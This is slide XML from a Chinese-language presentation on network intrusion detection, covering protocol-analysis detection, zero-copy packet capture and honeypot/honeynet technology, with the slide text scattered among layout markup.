          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="2191208"/>
            <a:ext cx="8839200" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="13920" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="126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利用网络协议的高度有序性</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9" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="2798903"/>
            <a:ext cx="8467725" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="13335" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>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在数据包的固定位置取值，</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>分析</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>协议</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>流量</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>及动作</a:t>
              </a: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2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F294EB09-43B1-46E4-8165-248CBA9C2F24}"/>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3" name="组合 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C39DD04-B524-1112-1CC0-F555A1D27117}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200871" y="2317447"/>
            <a:ext cx="8514879" cy="1914486"/>
            <a:chOff x="1448521" y="1071546"/>
            <a:chExt cx="7624041" cy="3150502"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87054" name="AutoShape 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28789A42-96A8-9365-4ACF-2F322EA8CB80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="1500166" y="1071546"/>
              <a:ext cx="7572396" cy="3150502"/>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7055" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91A89D1D-CFBD-EB98-16D0-D3F091C1F71E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="1448521" y="2333620"/>
              <a:ext cx="348609" cy="563937"/>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7056" name="TextBox 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C3C7045-C5E7-4EF6-1C81-5ECD12CEC0F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1820182" y="1218925"/>
              <a:ext cx="7143768" cy="27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根据现有协议模式，到固定位置取值</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根据取得的值，分析协议的流量，寻找可疑或不正常的行为</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加入状态特性分析，将会话流量作为整体来考虑</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当流量不是期望值时，</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IDS</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>就发出告警</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87044" name="组合 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0A07063-1135-72D3-E0C9-943007EAEFE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2541418"/>
            <a:ext cx="2515071" cy="1512656"/>
            <a:chOff x="-32" y="1357298"/>
            <a:chExt cx="1570017" cy="1548000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="87052" name="Picture 5" descr="DO_circle001">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0796B71C-1EC3-1C0C-ADC5-BDEC3BD9C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 y="1357298"/>
              <a:ext cx="1548000"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C9A73ED-B1DC-0B59-2879-92F929E5AA16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-32" y="1708729"/>
              <a:ext cx="1570017" cy="850414"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>协议分析</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>技术特点</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87045" name="组合 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E07572BE-36E4-1D88-C804-3D8FBCB625D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071814" y="4557850"/>
            <a:ext cx="7516783" cy="2199878"/>
            <a:chOff x="1354536" y="3595702"/>
            <a:chExt cx="7880910" cy="2428868"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87049" name="AutoShape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D1CB07C-BE40-8A20-BC1E-13B39668E9C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="1513287" y="3595702"/>
              <a:ext cx="7722159" cy="2428868"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 11505"/>
              </a:avLst>
            </a:prstGeom>
            <a:gradFill rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="6699FF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="0" scaled="1"/>
            </a:gra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7050" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CD7F081-2826-5CFA-2E75-A9467B12CE26}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="1354536" y="4619636"/>
              <a:ext cx="543511" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 58336"/>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7051" name="TextBox 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25DEBBFE-3DD7-3C17-E200-3B9E0E0A5E4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1936718" y="3595702"/>
              <a:ext cx="7207250" cy="2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性能提高。</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准确性提高。</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基于状态的分析。</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反规避能力大大增强。</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buBlip>
                  <a:blip r:embed="rId4"/>
                </a:buBlip>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>系统资源开销小。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="87046" name="组合 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{222A04AD-B07F-0879-6505-50FE513DB267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="801948" y="4793395"/>
            <a:ext cx="2351089" cy="1728788"/>
            <a:chOff x="58718" y="3143248"/>
            <a:chExt cx="1548000" cy="1548000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="87047" name="Picture 11" descr="DP_circle001">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB23EBF5-F970-16BF-3F98-C8E595927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18" y="3143248"/>
              <a:ext cx="1548000"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22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65722D85-DA05-0C69-8580-FFB7C35EBEAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="116969" y="3509655"/>
              <a:ext cx="1428760" cy="7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eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>协议分析</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>技术优点</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="组合 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF72CF4F-19A6-4418-B851-D2DB50AD8091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="3168000" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FEA2645-3AC5-9D97-3A1E-B45B91FEC6CB}"/>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20" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6FA336B-6685-1722-5586-FEFB5A98B49D}"/>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21" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C02AF3F-70F1-7BA6-C2DC-E62017648D8F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3848894" y="3293024"/>
              <a:ext cx="1127125" cy="46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2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>协议分析检测</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88AAE628-A4E8-4B27-992D-E8565DE0C94E}"/>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组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="3437078"/>
            <a:ext cx="9426575" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="14845" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1947"/>
              <a:ext cx="136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内存区域映射</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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0" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="D1EBF1"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="D1EBF1">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect l="2885" t="3925" r="1170" b="3781"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5280660" y="3274060"/>
            <a:ext cx="5900420" cy="2834005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="2234565" cy="720000"/>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sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>零复制</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="2191208"/>
            <a:ext cx="8839200" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="13920" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="12688"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减少数据复制和系统调用，实现</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CPU</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>零参与</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9" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1630161" y="2798903"/>
            <a:ext cx="8467725" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="13335" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1949"/>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en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>DMA</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>数据传输</a:t>
              </a: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endPar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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F4F8AA-4743-DF3F-38F2-F3A5EE5E7C7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960571" y="3001121"/>
            <a:ext cx="440046" cy="530571"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68BC3CEC-9DE4-E06D-8CC9-3715B64640B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1965493" y="3662059"/>
            <a:ext cx="271145" cy="4914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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA10DE44-8772-4FCA-9607-406719AA7765}"/>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13177" y="2184316"/>
            <a:ext cx="9123680" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="14368" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="1313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蜜罐</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>蜜网是吸引攻击者的陷阱</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1080000" y="1260000"/>
            <a:ext cx="2496185" cy="720000"/>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蜜罐</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蜜网技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="组合 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1433862" y="2887793"/>
            <a:ext cx="8508365" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="13399" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3156" y="1948"/>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sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>收集和分析威胁信息</a:t>
              </a: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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
